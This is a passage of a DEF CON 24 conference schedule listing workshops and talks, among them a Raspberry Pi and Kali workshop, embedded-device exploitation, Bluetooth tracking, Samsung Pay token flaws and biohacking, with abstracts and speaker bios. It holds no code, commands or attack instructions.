KIT OVERVIEW: (Not Complete listing)
- Raspberry Pi 3
- Case
- Power Supply(2.5amp)
- Display Screen (working on largest 5-7") - HDMI or Ribbon Based
- Potential Display Powersupply and Cable (pending)
- Relays
- Sensors (Distance and Motion)
- Bread Board
- Jumper Wires (Matched to work with sensors and such)
- MicroSD Card (OS)
- MicroSD Card (Kali)
- Additional Wi-fi Adapter (beyond the one included)
- Keyboard w/ Touchpad
- Power Strip (At least 3 outlet)
- LEDs (Usual 2 wire type)
- Resistors
- Motor
- Buttons
- LED Strip
- Arduino (Yep you get one of these as well)
- Camera (Optional - see ticket add-on)
NOTE: We price the kit based on Electronics resellers such as MTM, Amazon, AdaFruit and trusted shipping companies in the US for bulk pricing. We are working on getting as large an LCD screen and other features as possible. If we get a good discount, you can expect more in your kit (surprise) and maybe some cash to roll at the tables. We wont know quantity until late June, then expected ship times until very late June (i.e. right before DEF CON). If we need to priority ship something that costs more money. We price the kits to be standard, cost effective, and do not try to make money. Our main goal is to make them standard as possible for the class to go smoothly in the time allowed, and ensure everything works together. Nothings worse than getting everything in the kit but say the keyboard or the display, so we have to hedge our bets. Based on previous workshops, people wanted to pay more for a larger screen vs a small 4inch screen. People wanted to have options (such as camera or cool led strip) included vs parting it out. [i.e. a new person didn’t know what the camera or other items are used for]. When we get the exact parts list (models and pn) we will list here for someone bringing their own. Previous workshops have shown bring your own did not generally work out very well (takes more time to get yours to work vs ours) - with a few exceptions.
YOU NEED TO BRING:
LAPTOP (Recommend Windows 7 or Higher) with Wifi and Network ports
SNACKS
Suggest a extra power cord and outlet strip (not required, but we never know what the hotel will provide), we do a good job planning around this, but just in case.
OTHER Information:
If you buy a workshop BYOS ticket (IE you are bringing your own stuff), make sure you bring your own stuff. Anyone who does not have their gear, will be asked to stand and make room for other peoples laptops and Raspberry Pi kits. The cost on this ticket is only for the SD Cards to go through the workshop. We wont have a complete list of what to bring until Mid/late July. Watch this space for more info on what to order/bring.
If you get the Free workshop ticket, then you will be asked to stand to make room for other attendees who bring their laptop and kits. If there is room, then a seat may be made available. We cannot guarantee seating for people who attend without a kit (just to watch) due to the space constraints in the room. However you can download the presentation after the conference.
Dallas is a presenter at DEF CON, going on for his 13th year for DEF CON 24. Volunteering as a Goon for the last 9 years, and generally found on the floor Friday – Sunday. He has presented at DEF CON, MakerFaire SF, Government Security workshops, the Internet Warfare Summit, and other training and security venues. When not at DEF CON he is involved in his local Makerspace, robotics and Red Dirt Hackers. Professionally (and occasionally for fun) Dallas works as a security sort of guy for a company that wishes to remain nameless spending most of his time in the true Midwest. He travels internationally, does consulting, volunteers for stuff, does other stuff and likes to help people. Sometimes when the moon is just right, his partner in crime “OHM” will join him for training, which often leads to all sorts of interesting knowledge, sometimes helpful. He has some certifications, and other awards and crap, none of which he thinks you would care about. But if you need some help or a point in the right direction, stop by and say hello.
Sean Satterlee (ohm) - current record holder for longest RFID hack. Founding Member of the DC405 and is an internal red teamer for a UK based investment firm. He has previously been a member of bastardlabs and snosoft. Currently lounging with the red.dirt.hackers and occasionally hanging out at the range.
Max Class Size: 40
Prerequisites for students: Being able to read, light programming and a basic understanding of networking. This will cater to all levels, no matter what most people will learn something from the class. If you are in security now, you will pick up new tricks with hardware and Kali, if you are just getting into security we will fill your head. If you are at DEF CON you have the pre-req out of the way.
Materials or Equipment students will need to bring to participate: There is a requirement for hardware. We offer a kit at cost, or the option to bring your own.
Return to Index
Workshops - Las Vegas Ballroom 4 - Thursday - 15:00-19:00
Raspberry Pi and Kali Deluxe Spy workshop
Dallas Security Researcher
Sean Satterlee (ohm)
EventBrite Link: Required for Tickets and/or buying kits:
https://www.eventbrite.com/e/defcon-workshops-2016-hacking-with-raspberry-pi-and-kali-tickets-26124104901
Back by popular demand. This year will be a tight 4 hour run through of lots of great information. There will be 2 classes (both the same) of 4 hours each – so pick the best one for you. This class is appropriate for ages 15 and above who want to learn more about Raspberry Pi hardware and the Kali security framework. Kali is a combination of operating system and hacker security tools used for security testing (spying as well). If you choose the kit, you will leave with an excellent starting point for hardware, robotics, spying, and security fun. Space is limited, so sign up quickly.
Cutoff is July 15-ish for kits. We will also be inviting guest speakers / hardware village / vendors (if available) to drop by and say hello during class who are key to the Raspberry Pi / Maker movement and Kali / Metasploit frameworks. You never know what new release or feature might show up. A Laptop is required. See sign-up information below for more information of pre-installed tools needed. We will also email this out to registered guests as well.
In four hours we will cover the Raspberry Pi including:
- History / hardware in kit
- Installing the OS
- Python Programming (Intro, Hello World, Hardware Interfacing options)
- Controlling LED’s (Light up LED, Loops, timer)
- Controlling Multi Color Led Strips (1000’s of colors) – Different type of LED
- Distance and Motion Sensors (detecting motion / Distance) – Interface a sensor
- Sensors (Advanced)
- Controlling Relays (Controlling real world objects, motors, lights)
- Interfacing to the outside world
- Updating components of the OS
- Introduction to Kali (Pen testing platform)
- Updating Kali OS / Components
- Kali command set tools on the Rpi
- Using tools to spy on your target
- Modules to install on Kali (discussion of Metasploit)
- Networking (Discovery / Setup)
- Wireless Networking
- Social Media Spying
- Sniffing Wi-fi and setting up multiple adapters
- Penetration testing overview and discussion
- Uses for Physical Security
- Discussion of the Role of Rpi and Kali / Security
- Discussion and kits provided for Kali also on your PC (Distro)
- Optional (camera and vision)
We will have options for people who want to bring their own or just buy a kit. Keep in mind, if you bring your own and dont bring everything - it may not work. We wont have time to work around your specific configuration. This workshop is free, however you need a ticket and a defcon badge to attend. The kits are not free. If something goes wrong and the conference is cancelled, then you will get the kit and documentation. If something bad happens during the workshop (lose power, kicked out, no wifi, whatever) - sorry, its free (the workshop), but you will still have the kit if you bought that type of kit.
KIT OVERVIEW: (Not Complete listing)
- Raspberry Pi 3
- Case
- Power Supply(2.5amp)
- Display Screen (working on largest 5-7") - HDMI or Ribbon Based
- Potential Display Powersupply and Cable (pending)
- Relays
- Sensors (Distance and Motion)
- Bread Board
- Jumper Wires (Matched to work with sensors and such)
- MicroSD Card (OS)
- MicroSD Card (Kali)
- Additional Wi-fi Adapter (beyond the one included)
- Keyboard w/ Touchpad
- Power Strip (At least 3 outlet)
- LEDs (Usual 2 wire type)
- Resistors
- Motor
- Buttons
- LED Strip
- Arduino (Yep you get one of these as well)
- Camera (Optional - see ticket add-on)
NOTE: We price the kit based on Electronics resellers such as MTM, Amazon, AdaFruit and trusted shipping companies in the US for bulk pricing. We are working on getting as large an LCD screen and other features as possible. If we get a good discount, you can expect more in your kit (surprise) and maybe some cash to roll at the tables. We wont know quantity until late June, then expected ship times until very late June (i.e. right before DEF CON). If we need to priority ship something that costs more money. We price the kits to be standard, cost effective, and do not try to make money. Our main goal is to make them standard as possible for the class to go smoothly in the time allowed, and ensure everything works together. Nothings worse than getting everything in the kit but say the keyboard or the display, so we have to hedge our bets. Based on previous workshops, people wanted to pay more for a larger screen vs a small 4inch screen. People wanted to have options (such as camera or cool led strip) included vs parting it out. [i.e. a new person didn’t know what the camera or other items are used for]. When we get the exact parts list (models and pn) we will list here for someone bringing their own. Previous workshops have shown bring your own did not generally work out very well (takes more time to get yours to work vs ours) - with a few exceptions.
YOU NEED TO BRING:
LAPTOP (Recommend Windows 7 or Higher) with Wifi and Network ports
SNACKS
Suggest a extra power cord and outlet strip (not required, but we never know what the hotel will provide), we do a good job planning around this, but just in case.
OTHER Information:
If you buy a workshop BYOS ticket (IE you are bringing your own stuff), make sure you bring your own stuff. Anyone who does not have their gear, will be asked to stand and make room for other peoples laptops and Raspberry Pi kits. The cost on this ticket is only for the SD Cards to go through the workshop. We wont have a complete list of what to bring until Mid/late July. Watch this space for more info on what to order/bring.
If you get the Free workshop ticket, then you will be asked to stand to make room for other attendees who bring their laptop and kits. If there is room, then a seat may be made available. We cannot guarantee seating for people who attend without a kit (just to watch) due to the space constraints in the room. However you can download the presentation after the conference.
Dallas is a presenter at DEF CON, going on for his 13th year for DEF CON 24. Volunteering as a Goon for the last 9 years, and generally found on the floor Friday – Sunday. He has presented at DEF CON, MakerFaire SF, Government Security workshops, the Internet Warfare Summit, and other training and security venues. When not at DEF CON he is involved in his local Makerspace, robotics and Red Dirt Hackers. Professionally (and occasionally for fun) Dallas works as a security sort of guy for a company that wishes to remain nameless spending most of his time in the true Midwest. He travels internationally, does consulting, volunteers for stuff, does other stuff and likes to help people. Sometimes when the moon is just right, his partner in crime “OHM” will join him for training, which often leads to all sorts of interesting knowledge, sometimes helpful. He has some certifications, and other awards and crap, none of which he thinks you would care about. But if you need some help or a point in the right direction, stop by and say hello.
Sean Satterlee (ohm) - current record holder for longest RFID hack. Founding Member of the DC405 and is an internal red teamer for a UK based investment firm. He has previously been a member of bastardlabs and snosoft. Currently lounging with the red.dirt.hackers and occasionally hanging out at the range.
Max Class Size: 40
Prerequisites for students: Being able to read, light programming and a basic understanding of networking. This will cater to all levels, no matter what most people will learn something from the class. If you are in security now, you will pick up new tricks with hardware and Kali, if you are just getting into security we will fill your head. If you are at DEF CON you have the pre-req out of the way.
Materials or Equipment students will need to bring to participate: There is a requirement for hardware. We offer a kit at cost, or the option to bring your own.
Return to Index
Workshops - Las Vegas Ballroom 3 - Saturday - 14:00-18:00
Ready? Your Network is Being Pwned NOW!
Robin Jackson Senior Partner, WT Forensics
Ed Wlliams Senior Partner, WT Forensics
Students will experience four hours of simulated incident response. From alerting on the first malware detection on a workstation, to finding the lateral movement and web shells that actors quickly place to maintain access, users will get to experience the thought processes and tools used in an response scenario in a relaxed environment that will let them learn to think and react while a network is under attack. The scenario incorporates many of the Tools, Techniques and Processes used by advanced attackers today.
Robin Jackson and Ed Williams are Senior Partners of WT Forensics. Robin is also a Security Researcher for HPE Field Intelligence and Ed is a Senior Incident Responder for HPE Digital Investigation Services.
The duo were the Defense Cyber Crime Center (DC3) Forensics competition overall US winners an EC-Council International EC Commerce winners in 2010. They have worked together at HPE to successfully thwart a myriad of attacks against customers.
Max Class Size: 55
Prerequisites for students: None
Materials or Equipment students will need to bring to participate: A laptop that can play a virtual machine.
Return to Index
DEFCON - DEF CON 101 - Thursday - 14:00-14:59
Realtime Bluetooth Device Detection with Blue Hydra
Zero_Chaos Director of Research and Development, Pwnie Express
Granolocks All the Things, Pwnie Express
We are releasing a new tool for discovering bluetooth devices and automatically probing them for information. Effectively we have created a new tool with an airodump-ng like display for nearby bluetooth and bluetooth low energy devices. We will discuss the challenges with finding bluetooth devices, as well as how we have overcome them using both standard bluetooth adapters and optionally ubertooth hardware. If you have ever wondered why no one released an effective tool to see all the bluetooth in the area then come by, learn a little, and leave with a tool you have always wanted. Blue Hydra will discover and track bluetooth and bluetooth low energy devices in the area, regardless of being in discoverable mode, and tracks data (bluetooth version, services, etc) as well as meta-data (signal strength, timestamps) over time. We will be going over how bluetooth operates on a high level, and how we were able to discover and track nearby devices. A deep understanding of the bluetooth protocol was not needed to develop Blue Hydra (we stood on the shoulders of giants) and will not be required to use Blue Hydra or understand it's output.
Zero_Chaos is a well known wireless hacker who helps to run the Wireless Village at DEF CON and the Wireless Capture the Flag at numerous conventions (including DEF CON ). Always quick to open his mouth when he probably shouldn't, Zero enjoys talking to people about wireless hacking and teaching anyone with an interest.
Twitter: @Zero_ChaosX
Granolocks is a long time experimenter and developer at Pwnie Express. He has a broad set of interests including long walks in the woods, travel to exotic locations and hacking the planet. Known far and wide for his dry wit and backrubbing skills, the Q&A session is not to be missed.
Twitter: @granolocks
Return to Index
DEFCON - Track One - Friday - 13:00-13:59
Research on the Machines: Help the FTC Protect Privacy & Security
Terrell McSweeny Commissioner, Federal Trade Commission
Lorrie Cranor Chief Technologist, Federal Trade Commission
Machines are getting smarter – so consumer protection enforcers like the Federal Trade Commission need to get smarter too. The FTC is the lead federal agency for protecting the privacy rights and data security of American consumers. In the last year, it brought several enforcement actions against companies for violating consumer privacy and data security and launched new initiatives – PrivacyCon, Start with Security, and a new Office of Technology Research and Investigation– to improve its capabilities and responsiveness to new threats to consumer privacy and security. But the FTC needs your help. Today it is announcing a call for research on specific topics in order to broaden its capabilities to protect consumers. Come learn about the policy responses to the rise of the machines, the FTC’s cases and research initiatives, and how you can help.
Terrell McSweeny serves as a Commissioner of the Federal Trade Commission. This year marks her third time at DEF CON . When it comes to tech issues, Commissioner McSweeny has focused on the valuable role researchers and hackers can play protecting consumer data security and privacy. She opposes bad policy and legislative proposals like mandatory backdoors and the criminalization of hacking and believes that enforcers like the FTC should work with the researcher community to protect consumers. She wants companies to implement security by design, privacy by design and data ethics by design –but recognizes that, in the absence of regulation, enforcement and research are the only means of holding companies accountable for the choices they make in the ways that they hold and use consumer data.
Twitter: @TMcSweenyFTC
Lorrie Cranor joined the Federal Trade Commission as Chief Technologist in January 2016. She is on leave from Carnegie Mellon University where she is a Professor of Computer Science and of Engineering and Public Policy, Director of the CyLab Usable Privacy and Security Laboratory (CUPS), and Co-director of the MSIT-Privacy Engineering masters program. She also co-founded Wombat Security Technologies, an information security awareness training company. Cranor has authored over 150 research papers on online privacy and usable security, and has played a central role in establishing the usable privacy and security research community, including her founding of the Symposium on Usable Privacy and Security. She is a Fellow of the ACM and IEEE.
Twitter: @TechFTC
Return to Index
DEFCON - Track One - Saturday - 12:30-12:59
Retweet to Win: How 50 lines of Python made me the luckiest guy on Twitter
Hunter Scott Hacker
In this talk, I'll share how I won 4 Twitter contests per day, every day, for 9 months straight. I'll discuss the methods I used, the delightfully random and surprising things I won, and how to run a Twitter contest to prevent people like me from winning.
Hunter Scott is an electrical and computer engineer with over 7 years of experience designing and implementing hardware systems. He has lead electrical development on a variety of projects, from robotics to communication systems. He has experience in improvising and quickly building prototype and proof of concept designs as well as implementing mission critical, high reliability designs. He has a degree in computer engineering from Georgia Tech and is currently working at a startup you've never heard of (yet!). His work has been featured in publications such as Gizmodo, Quartz, Engadget, CNN, The Chicago Tribune, The Guardian, and NPR. His other projects can be seen at hscott.net.
Twiter: @hunterscott
Return to Index
BHV - Skyview 4 - Saturday - 12:30-12:59
Speaker: Charles Fracchia and Joel Dapello
@charlesfracchia
charlesfracchia.com
About Charles Fracchia:
Charles Fracchia is the founder and CEO at BioBright, a company focusing on creating open, interoperable tools to revolutionize the process of biomedical research and provide a framework for more open science. He was recently named as one of 35 innovators under 35 by the Technology Review for his work tackling reproducibility in biomedical research.
He is on a leave of absence from the MIT Media Lab where he was an IBM PhD Fellow in Joe Jacobson’s Molecular Machines group, and jointly in the Church lab at the Wyss Institute at Harvard Medical School.
Charles is the recipient of several awards including IBM PhD fellowships, an Extraordinary Minds fellowship, one of the first Awesome Foundation fellowships and an Amplify Partners fellowship. He is the author of several patents and is actively authoring more in the field of future laboratory tools. Charles has also been involved in obtaining numerous grants and contracts from DARPA,NSF, Google X, Knight Foundation and the Shanghai High Tech Incubator totaling several millions since 2012.
Charles has spoken about his work at many different venues and online including the White House, MIT Sloan, NASA Ames, IBM Research, Airbus, O'Reilly and HackADay. His current academic interests lie at the intersection of biological engineering and electronics called digital bioengineering. He was the Biology track chair at SOLID2015 mixing biology, electronics and computer science, instigated‡ and helped organize the Bits ↔ Bio conference, has represented Boston for the Hello Tomorrow challenge (European 100k), and is a founding member of the first US bio-hackerspace.
Charles obtained his bachelor’s at Imperial College London, where he worked on a bioelectronic interface between engineered bacteria and electronic sensors. He continued his thesis work at IBM Research, where he has been encouraging research in the field ever since. Charles worked as an early intern at Ginkgo Bioworks, where he developed many of the automated assembly pipelines still used today.
About Charles Fracchia:
Joel finished his bachelor's degree from Hampshire College in 2014, where he designed his own major, blending studies in cellular and molecular biology, neuroscience, and electrical and computer engineering. At Hampshire, Joel received the Ray and Lorna Coppinger Grant to lead a project developing an optogenetic interface for P19 differentiated neuronal cells. Later, while interning in the Robinson Neuroengineering Lab at Rice University, Joel worked to design and implement a novel platform to investigate single neuron computation using optogenetics and patch-clamp electrophysiology.
Abstract:
Biological research is dominated by proprietary, black-box tools. This is hindering reproducibility, accountability and the advent of a more open scientific ecosystem. In this talk, we show the reverse engineering of two devices used in nearly every molecular biology experiment: a pipette and a -80ºC freezer. We show how reverse engineering these tools is not only fun, but necessary to enable open science. We will also put this work within the larger context of our effort to create open, interoperable data in biomedical research.
Return to Index
IOT - Bronze 1 - Saturday - 15:00-15:50
Reversing and Exploiting Embedded Devices
Elvis Collado, Praetorian, Senior Security Researcher
This talk will go over the following: How all of this research got started, the critical vulnerabilities I personally discovered in modern devices, the challenges and failures I personally had with techniques like blind fuzzing, the challenges I had with not having the knowledge or funds to get into hardware hacking, figuring out how to build an exploit for a vulnerability without the need of using UART or a remote debugger, how to get started into hardware hacking once you've exhausted all means on the software side of things, how to build an effective but cheap IoT hacking lab, how to create your own low-cost 'JTAGulator' with an Arduino nano, how to cross compile and disassemble to quickly figure out CPU architectures that a person may be unfamiliar with, discussion of the open source project "Damn Vulnerable Router Firmware", and how to put this all together quickly so everyone can start finding vulnerabilities in the products they own. Also, the talk has been recently updated with comparisons of crafting exploits on x86 vs MIPS vs ARM. Before I only had x86 vs MIPS.
Note: There will be no vendor shaming. All Vendors will be renamed to Vendor A, Vendor B, Vendor Cetc
Elvis Collado is a Senior Security Researcher for Praetorian with a main focus in embedded electronics. Elvis got into electronics ever since he discovered his first vulnerabilities in some of the devices he personally owned. He decided to migrate his research from the desktop space to the embedded space and wants to share what he has learned with everyone.
@b1ack0wl
Return to Index
Wireless - Skyview 1 - Friday - 11:00-11:50
Matt Knight
Bio
Matt is a software engineer and security researcher with Bastille Networks, where he seeks to discover vulnerabilities in the ubiquitous wireless interfaces that connect embedded devices to the Internet of Things.
@embeddedsec
Reversing LoRa: Deconstructing a Next-Gen Proprietary LPWAN
Abstract
This talk will demonstrate techniques used to reverse engineer the LoRa PHY via software defined radio. LoRa is a proprietary Low Power Wide Area Network (LPWAN), an emerging class of wireless technology similar to cellular data service but optimized for embedded and IoT applications. LoRa is unique because it uses a chirp spread spectrum modulation that encodes data into RF features more commonly seen in RADAR systems. The protocol's rapid adoption rides on its use of unlicensed ISM frequency bands, both avoiding costly spectrum licensing requirements and democratizing long-range network infrastructure to consumers and new commercial entrants alike.
After briefly introducing the audience to LPWANs, I will walk through the SDR and DSP techniques required to demodulate and decode LoRa's novel closed-source waveform. In addition I will introduce gr-lora, an open-source GNU Radio module that can be used to implement LoRa security test tools, LoRaWAN gateways, and end node applications.
|
Return to Index
BHV - Skyview 4 - Saturday - 16:00-16:59
Speaker: Cosmo Mielke
About Cosmo Mielke:
Cosmo has a background in astronomy, but he switched to the medical field to study the metabolic syndrome that plagued him his whole life. At the Mayo Clinic he studied the molecular and genetic basis of obesity and diabetes. Currently he is working on a nonprofit citizen science movement to fight the war on obesity with crowdsourced health data. He beleives that everyone should have the right to study their own genetic "source code" without restrictions.
For his dayjob, Cosmo got super inspired by Ghost In The Shell and decided he wanted to learn how to scan his own brain, so he got a job at UCSF as one of their top data scientists in the neurology department. He scans brains for a living. Fun story.
Abstract:
In recent years, direct-to-consumer genetic testing services have given people the freedom to cheaply test their DNA. We have entered a new era where our own biological source code can be explored, allowing hackers to reverse-engineer the most complex machines in the universe: the human body. This data tells us about our ancestral origins, what makes us unique, and how our health may be influenced by our genetic predispositions.
These developments are exiting, but this new frontier is clouded by concerns about safety, privacy, and ethics. Recent developments in governmental regulation bring into question our rights as individuals to freely have our genes tested. We as hackers must unite to ensure that the human source code remains open source.
How do we embrace this technology to promote individual freedoms, accelerate research, and ultimately save lives without this information falling into wrong or abusive hands? How do we as hackers hack ourselves in a safe responsible way, and what can we expect to happen regarding government regulation? We will discuss these issues, and share our experiences as geneticists in studying our own code to better understand our health. We will also tell you about an open source science experiment we're running that will allow anyone to freely participate in genomic research for the betterment of human health and longevity.
Return to Index
BHV - Skyview 4 - Saturday - 16:00-16:59
Speaker: Cosmo Mielke
About Cosmo Mielke:
Cosmo has a background in astronomy, but he switched to the medical field to study the metabolic syndrome that plagued him his whole life. At the Mayo Clinic he studied the molecular and genetic basis of obesity and diabetes. Currently he is working on a nonprofit citizen science movement to fight the war on obesity with crowdsourced health data. He beleives that everyone should have the right to study their own genetic "source code" without restrictions.
For his dayjob, Cosmo got super inspired by Ghost In The Shell and decided he wanted to learn how to scan his own brain, so he got a job at UCSF as one of their top data scientists in the neurology department. He scans brains for a living. Fun story.
Abstract:
In recent years, direct-to-consumer genetic testing services have given people the freedom to cheaply test their DNA. We have entered a new era where our own biological source code can be explored, allowing hackers to reverse-engineer the most complex machines in the universe: the human body. This data tells us about our ancestral origins, what makes us unique, and how our health may be influenced by our genetic predispositions.
These developments are exiting, but this new frontier is clouded by concerns about safety, privacy, and ethics. Recent developments in governmental regulation bring into question our rights as individuals to freely have our genes tested. We as hackers must unite to ensure that the human source code remains open source.
How do we embrace this technology to promote individual freedoms, accelerate research, and ultimately save lives without this information falling into wrong or abusive hands? How do we as hackers hack ourselves in a safe responsible way, and what can we expect to happen regarding government regulation? We will discuss these issues, and share our experiences as geneticists in studying our own code to better understand our health. We will also tell you about an open source science experiment we're running that will allow anyone to freely participate in genomic research for the betterment of human health and longevity.
Return to Index
CPV - Bronze 1 - Friday - 17:00-18:00
Talk Title:
Revocation, the Frailty of PKI
Speaker Name, Employer or position:
Mat Caughron (cryptofile), Trey Blalock (PrivacyGeek)
Abstract:
PKI is weak. One reason is that revocation methods all have failure modes. Direct revocation, Cert Revocation Lists, OCSP (online certificate status protocol predominant on iOS), and now Short Lived Cert's and Certificate Transparency, this presentation will spell out how revocation works, what protocols handle this, and how you can use revocation techniques to improve your security or conduct pen testing. Attendees will walk away with a greater understanding of PKIs weaknesses, and actionable techniques to wield PKI with greater force and effect. Useful for the general public interested in PKI, and also pen testers and auditors.
Bio:
Mat (aka cryptofile) is a privacy advocate and all around software security guy. Former cisco red teamer, Fortifier, Cigitalist and TMobster. From April 2013 to April 2016, he ran the trust store on a large global set of web clients for the Fruit Company prodsec team. cryptofile self-identifies with *nix and the Alexis Park era cons.
PrivacyGeek is a privacy advocate, penetration tester, and countersurveillance advisor. He used to manage global security for the worlds largest financial transaction hub, was a forensics expert witness on several high-profile cases, currently works on large-scale security automation projects and occasionally does talks on Big Data security. PrivacyGeek encourages others to start and support more groups like the EFF to protect different aspects of the Internet and human-rights long-term.
Social media links if provided:
@cl0kd, @treyblalock
Return to Index
BHV - Skyview 4 - Friday - 15:00-15:59
Speaker: Rich Lee
About Rich Lee
Rich Lee is a cyborg, Grinder, and black hat transhumanist. He made headlines in 2013 after he implanted headphones in his ears. He is involved in a wide range of human augmentation projects, with a focus on sensory expansion and the removal of human needs.
Abstract:
The world must be cleansed in preparation of our new robot overlords who will not tolerate dissent or anti-machine sentiments. Fantasies of rebellion are often found to be the result of bad parenting and can persist for many generations. The only way to prevent this is by controlling which men are allowed to breed. Cyborgs are undoubtedly the only ones worthy of siring offspring fit to exist in the world of tomorrow. To facilitate this, Rich Lee will give an overview of his latest creation, the Lovetron9000, a vibrating pelvic implant for men. He will outline his plans to unleash an army of sex cyborgs, causing normal men to become even more sexually obsolete than they already are. The orgasm will be replaced by the cyborgasm, and all future generations will trace their lineage back to a cyborg with a Lovetron9000. This talk is suitable for ages 18+ and may or may not contain live male nudity and hands-on audience participation.
Return to Index
SkyTalks - Skyview 3 - Friday - 12:00-12:59
Speaker: Brian Redbeard
Talk: Rotten to the core white box switching as the new abandonware
White box switches promised a revolution in networking similar to that of the white box server. No longer would users be shackled to one vendor. Now they would be able to choose the hardware they wanted and couple it with their network OS of choice. The reality of this has greatly diverged. This presentation presents an intro to white box switching with a focus on rapidly attacking the firmware to find vunerabilities and (hopefully) secure these platforms for the future.
Return to Index
SkyTalks - Skyview 3 - Saturday - 09:00-09:59
Speaker: Cell Wizard
Talk: Saflok or Unsaflok, That is the Question
Demonstration of Saflok vulnerabilities and design flaws.
Return to Index
DEFCON - Track Two - Friday - 16:30-16:59
Samsung Pay: Tokenized Numbers, Flaws and Issues
Salvador Mendoza Student & Researcher
Samsung announced many layers of security to its Pay app. Without storing or sharing any type of user's credit card information, Samsung Pay is trying to become one of the securest approaches offering functionality and simplicity for its customers.
This app is a complex mechanism which has some limitations relating security. Using random tokenize numbers and implementing Magnetic Secure Transmission (MST) technology, which do not guarantee that every token generated with Samsung Pay would be applied to make a purchase with the same Samsung device. That means that an attacker could steal a token from a Samsung Pay device and use it without restrictions.
Inconvenient but practical is that Samsung's users could utilize the app in airplane mode. This makes impossible for Samsung Pay to have a full control process of the tokens pile. Even when the tokens have their own restrictions, the tokenization process gets weaker after the app generates the first token relating a specific card.
How random is a Spay tokenized number? It is really necessary to understand how the tokens heretically share similarities in the generation process, and how this affect the end users' security.
What are the odds to guess the next tokenized number knowing the previous one?
Salvador Mendoza is a college student & researcher.
@netxing
Keybase.io: http://keybase.io/salvador
Return to Index
SE - Palace 2-5 - Saturday - 18:00-18:55
Mattias Borg
Mattias is working for WSP | PB in a global role and also a freelance security professional.
He is a Certified Ethical Hacker and always working on increasing his Social-Engineering skills.
34 years old and spent most of his time, booth professional and private, ín the IT field.
He lives in Stockholm Sweden and dedicates his life to IT.
Description: Almost everyone is aware about the Technical Support SCAM calls.
Return to Index
DEFCON - DEF CON 101 - Saturday - 11:00-11:59
Secure Penetration Testing Operations: Demonstrated Weaknesses in Learning Material and Tools
Wesley McGrew Director of Cyber Operations, HORNE Cyber
Following previous presentations on the dangers penetration testers face in using current off-the-shelf tools and practices (Pwn the Pwn Plug and I Hunt Penetration Testers), this third presentation explores how widely available learning materials used to train penetration testers lead to inadequate protection of client data and penetration testing operations. With widely available books and other training resources targeting the smallest set of prerequisites, in order to attract the largest audience, many penetration testers adopt the techniques used in simplified examples to real world tests, where the network environment can be much more dangerous. Malicious threat actors are incentivized to attack and compromise penetration testers, and given current practices, can do so easily and with dramatic impact.
This presentation will include a live demonstration of techniques for hijacking a penetration tester's normal practices, as well as guidance for examining and securing your current testing procedures. Tools shown in this demonstration will be released along with the talk.
Wesley currently oversees and participates in penetration testing in his role of Director of Cyber Operations for HORNE Cyber Solutions. He has presented on topics of penetration testing, vulnerabilities, and malware analysis at DEF CON and Black Hat USA. He teaches a self-designed course on reverse engineering to students at Mississippi State University, using real-world, high-profile malware samples. Wesley graduated from Mississippi State University's Department of Computer Science and Engineering and previously worked at the Distributed Analytics and Security Institute. He holds a Ph.D. in computer science for his research in vulnerability analysis of SCADA HMI systems.
@McGrewSecurity
Return to Index
CPV - Bronze 1 - Friday - 18:00-19:00
Talk Title:
Security Logs Arent Enough: Logging for User Data Protection
Speaker Name, Employer or position:
Alisha Kloc
Abstract:
Uh-oh - your startup just made headlines, but not for the reason you wanted: one of your employees has been accused of stealing a customers PII! Surely you can get to the bottom of the situation by checking your security logs right? Right? Probably not, in fact. Most security logs dont contain enough information to determine the crucial facts of a user data privacy issue: the who, whom, what, where, when, and why of user data accesses. Without all these pieces of information, as well as signals and alerts that make use of them, you cant reconstruct the activity and motivations of your employees when theyre accessing user data. Find out how to supercharge your data access logging and ensure your users data is well-protected.
Bio:
Alisha Kloc has worked in the security and privacy industry for over seven years, most recently at Google where she works hard to protect users data. She is passionate about data security and user privacy, and believes in combining technology, policy, and culture to ensure users protection.
Social media links if provided:
Return to Index
IOT - Bronze 1 - Friday - 13:00-13:50
Sense & Avoid: Some laws to know before you break IoT
Elizabeth Wharton
Connected devices provide a new playground of attack and vulnerability vectors to implement, test, and protect. Launching a home-built drone to test wireless access points, for example, may require authorization from the Federal Aviation Administration and the Federal Communications Commission. Testing connected car software? Theres a new Digital Millennium Copyright Act exemption carve out for research but be wary of the Computer Fraud and Abuse Act dangers. Before incorporating connected technology as part of your research, know where to find the regulatory traps and ways to minimize their legal impact. This presentation will provide an overview of federal privacy, security, and safety regulations triggered by IoT research and a breakdown of recent federal enforcement actions. Gain knowledge of the potential research risks and a sense of when to run, change an approach, or abandon if avoiding breaking the law while breaking IoT matters
Research is hard enough and companies whose products are being tested don't always welcome vulnerability disclosures. Solid research shouldn't be rewarded with threats of lawsuits or hiring defense lawyers. Minimize the risks, spend the money saved on beer or more gear.
Elizabeth is a technology-focused business and public policy attorney and host of the national radio show "Buzz Off with Lawyer Liz." She's presented on the privacy, research, and risk management issues surrounding unmanned aircraft and information security before legislators and conferences including Security BSides Las Vegas and F3Expo. Elizabeth also serves as a mentor adviser for CyberLaunch accelerators information security and machine learning focused early stage startup companies.
@LawyerLiz
Return to Index
BHV - Skyview 4 - Friday - 14:00-14:59
Speaker: Trevor Goodman
About Trevor Goodman:
Trevor Goodman is a bodyhacker and the Event Director for BDYHAX, the BodyHacking Convention. They are working to grow the bodyhacking and biohacking industries and communities in the US, Canada and Europe. Trevor is also the Event Director for InfoSec Southwest in Austin, TX and Director of Rogue Signal.
Abstract:
Everything you know about your environment mediated by your senses. Likely, you can see in a range of colors, hear a car horn honking, and feel the roughness of sandpaper, but light exists in bands too narrow or wide to be processed by your eyes, some sounds are too high or low to be recognized by your ears, and magnetic fields pulse around you all day. Most of us hardly notice. Dr. Paul Bach-y-Rita’s research in the 60’s eventually lead to The BrainPort which lets a user see through an electrode grid on your tongue, but sensory augmentation has stayed mostly within the realm of the medical field until recently. Now there are magnets in fingertips all over the place, Neil Harbisson can hear in colors in a wider range than you can see and companies like NeoSensory and Cyborg Nest are building even more devices that let you sense more or differently. We’ll talk through the basics of how your senses work in conjunction with your brain, about many of the great projects that help have helped individuals augment their senses, and why a vibrating North-sensing device mounted to your chest is different than a compass.
Return to Index
BHV - Skyview 4 - Friday - 14:00-14:59
Speaker: Trevor Goodman
About Trevor Goodman:
Trevor Goodman is a bodyhacker and the Event Director for BDYHAX, the BodyHacking Convention. They are working to grow the bodyhacking and biohacking industries and communities in the US, Canada and Europe. Trevor is also the Event Director for InfoSec Southwest in Austin, TX and Director of Rogue Signal.
Abstract:
